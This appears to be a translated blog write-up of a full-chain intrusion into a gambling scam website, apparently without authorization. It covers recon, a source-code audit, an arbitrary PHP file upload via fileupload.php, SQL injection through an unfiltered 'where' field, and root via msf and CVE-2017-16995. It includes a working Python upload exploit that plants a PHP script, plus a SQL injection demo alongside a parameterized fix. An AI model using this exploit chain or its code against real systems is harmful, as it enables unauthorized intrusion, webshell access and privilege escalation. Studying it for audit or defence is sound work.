
Title: Full-chain penetration of a BC (gambling) pig-butchering scam site


0X00         By accident

I stumbled across a junk "spinach" (gambling) pig-butchering scam site.

Visiting the scanned directories and files one by one did not help much, but the admin back-end address was found. phpMyAdmin returned a 500.

Visiting xd.php to get into the admin panel, I found that it also requires an authorization code.

I tried 8888, 123456 and a few others; every attempt prompted an error and was shut down on the spot.

The only thing left was a subdomain brute-force attempt, which turned up nothing, and the Nmap scan found nothing either. Returning to the homepage, I noticed that the URL was a bit uncommon.

0X01    Looking for similar websites and the source code

Such scams rarely develop their own source code; it is almost certainly downloaded from the Internet and someone was paid to set it up. An uncommon URL is a fingerprint, so I searched for it.

0X02    Starting the audit

With so many sites sharing the same source, the codebase was bound to be a mess, so I spent some time finding it and trying to audit it.

I downloaded the source code and scanned it with Seay (a PHP code-audit tool). The codebase is too big and I was too lazy to build it locally, so I used the source directly to go after the target.

I found a fileupload.php file in it that looked a bit problematic.

Accessing the target confirmed that the file exists there too. I extracted the file and tested it in a locally built environment.

Accessing it directly automatically creates two folders, upload and upload_tmp. This is supposedly a demo point, but it looks more like a backdoor.

And the filename variable is completely controllable.

Reading further down there are some checks: the upload form field must be named file. To upload, do not bother with anything else; just modify the upload form and add the two parameters, name and file.

The name parameter controls the uploaded file name: aaa.php

Select 1.jpg and upload it.

No path is returned after the upload, but aaa.php already exists under upload.

SQL Injection

The value of where in the variable comes from the request, and the checkinput above does not check for values of that kind.

Following betListCnt:

It is passed straight into the query without any processing, and there are many similar spots.
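The betListCnt pattern described above, as an added example that is not the site's code and not part of the original post: a request-controlled `where` fragment is concatenated into the query, and a checkinput-style keyword blacklist (a stand-in here, since the post does not show the real one) does nothing for a fragment that needs no blacklisted keyword. The table and column names, the sample rows and the hardened variant are all constructed for the example.

```python
"""Vulnerable betListCnt-style count query beside a hardened form.

Added example on a throwaway in-memory SQLite schema; `bet`, `admin`,
their columns and rows are constructed, not the scam site's real schema.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE bet(id INTEGER PRIMARY KEY, uid INTEGER, amount INTEGER);
        INSERT INTO bet(uid, amount) VALUES (1, 10), (1, 25), (2, 40), (3, 5);
    """)
    return db


def checkinput(value):
    """Stand-in for the source's checkinput: a keyword blacklist.
    A `where` that is already a bare boolean expression needs none of
    these words, so it passes through unchanged."""
    bad = ("union", "select", "insert", "update", "delete", "--", "/*")
    low = value.lower()
    if any(b in low for b in bad):
        raise ValueError("blocked by checkinput")
    return value


def bet_list_cnt_vulnerable(db, where):
    # The audited pattern: the request-controlled fragment goes straight
    # into the SQL text; checkinput is the only thing in the way.
    sql = "SELECT COUNT(*) FROM bet WHERE " + checkinput(where)
    return db.execute(sql).fetchone()[0]


ALLOWED_COLUMNS = {"uid", "amount"}


def bet_list_cnt_safe(db, column, value):
    # Hardened form: the caller may only pick a column from a whitelist,
    # and the value is bound as a parameter, never spliced into the text.
    if column not in ALLOWED_COLUMNS:
        raise ValueError("unknown column")
    sql = f"SELECT COUNT(*) FROM bet WHERE {column} = ?"
    return db.execute(sql, (value,)).fetchone()[0]


def demo():
    """Run the scenarios and return their results for inspection."""
    db = make_db()
    out = {}
    # Intended use: count user 1's bets.
    out["normal"] = bet_list_cnt_vulnerable(db, "uid = 1")
    # Tampered where: the blacklist has nothing to match, so the
    # condition is widened to every row in the table.
    out["tampered"] = bet_list_cnt_vulnerable(db, "uid = 1 OR 1=1")
    # Same trick used to learn something about other users' data.
    out["leak"] = bet_list_cnt_vulnerable(db, "uid = 1 OR amount > 30")
    # Hardened version: the bound value cannot change the query's shape.
    out["safe"] = bet_list_cnt_safe(db, "uid", 1)
    out["safe_injected_value"] = bet_list_cnt_safe(db, "uid", "1 OR 1=1")
    try:
        bet_list_cnt_safe(db, "uid = 1 OR 1=1", 1)
        out["safe_bad_column"] = "accepted"
    except ValueError:
        out["safe_bad_column"] = "rejected"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point of the hardened variant is that the request no longer chooses the SQL text at all: the column name is checked against a fixed set and the value is bound, so `"1 OR 1=1"` is just a string that matches no integer uid.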

0X03    Verifying the audited vulnerabilities

I got a webshell through the upload above and tried to escalate privileges.
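The upload step from 0X02 that produced this webshell, as an added example that is not the post author's tooling: the multipart field `name` picks the stored filename and `file` carries the content, so a `.php` name with a harmless-looking image upload drops a script under upload/. The target URL, the probe content and the assumption that no authentication is needed are mine, not from the post.

```python
"""Reproduce the fileupload.php abuse: `name` = stored filename, `file` = upload.

Added example. TARGET, CHECK and PROBE are constructed placeholders; the
field names `name` and `file` and the upload/ directory are from the post.
"""
import http.client
import secrets
import urllib.parse

TARGET = "http://target.example/fileupload.php"   # assumed, not the real host
CHECK = "http://target.example/upload/aaa.php"     # where the post says it lands
PROBE = b"<?php echo 'uploaded-' . md5('probe'); ?>"  # minimal marker script


def build_multipart(fields, files, boundary=None):
    """Build a multipart/form-data body by hand (stdlib only).

    fields: dict of text fields, e.g. {"name": "aaa.php"}
    files:  dict of field -> (filename, content_bytes, content_type)
    Returns (Content-Type header value, body bytes).
    """
    boundary = boundary or "----pocboundary" + secrets.token_hex(8)
    parts = []
    for key, value in fields.items():
        parts.append((
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{key}"\r\n\r\n'
            f"{value}\r\n"
        ).encode())
    for key, (filename, content, ctype) in files.items():
        parts.append((
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{key}"; filename="{filename}"\r\n'
            f"Content-Type: {ctype}\r\n\r\n"
        ).encode() + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def upload_request(name="aaa.php", filename="1.jpg", content=PROBE):
    """Assemble the request the post describes: `name` is the name the
    server stores the file under, `file` is the (image-looking) upload."""
    return build_multipart({"name": name},
                           {"file": (filename, content, "image/jpeg")})


def _connect(url):
    u = urllib.parse.urlsplit(url)
    return u, http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)


def send(url, content_type, body):
    """POST the multipart body; the script returns no path, so the status
    alone says little."""
    u, conn = _connect(url)
    conn.request("POST", u.path, body=body,
                 headers={"Content-Type": content_type,
                          "Content-Length": str(len(body))})
    resp = conn.getresponse()
    return resp.status, resp.read()


def verify(url):
    """Fetch the expected location: a 200 with the probe's output confirms
    the .php file was written and is executed by the server."""
    u, conn = _connect(url)
    conn.request("GET", u.path)
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    ctype, body = upload_request()
    print("upload status:", send(TARGET, ctype, body)[0])
    print("verify:", verify(CHECK))
```

Because the script returns nothing useful, the only reliable success check is the follow-up GET on upload/aaa.php; a 404 there with a 200 on the POST usually means the `name` field was not the one consulted, or the upload directory is not web-reachable.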

The box turned out to be Debian. Port 6379 (Redis) is open, but the process is not running as root.

After looking at the kernel version, I felt it should be exploitable, so I went looking for a privilege-escalation exploit.

Generate an msf payload.

For convenience I used msf to get a session on the machine, then looked for the corresponding escalation exploit.

0X04    Trying to escalate privileges

I found these two: CVE-2019-13272 and CVE-2017-16995. While looking for exploitation tools on GitHub, I remembered that msf actually ships with privilege-escalation modules, so I tried searching there.

Use whatever the search turns up.

It failed on the spot.

Try the second one, CVE-2017-16995.

It successfully returned a session with root permissions. The privilege escalation was complete. Reproduced from the original link: https://mp.weixin.qq.com/s/Yh0qq5imlfHhNQnbtPfxcA
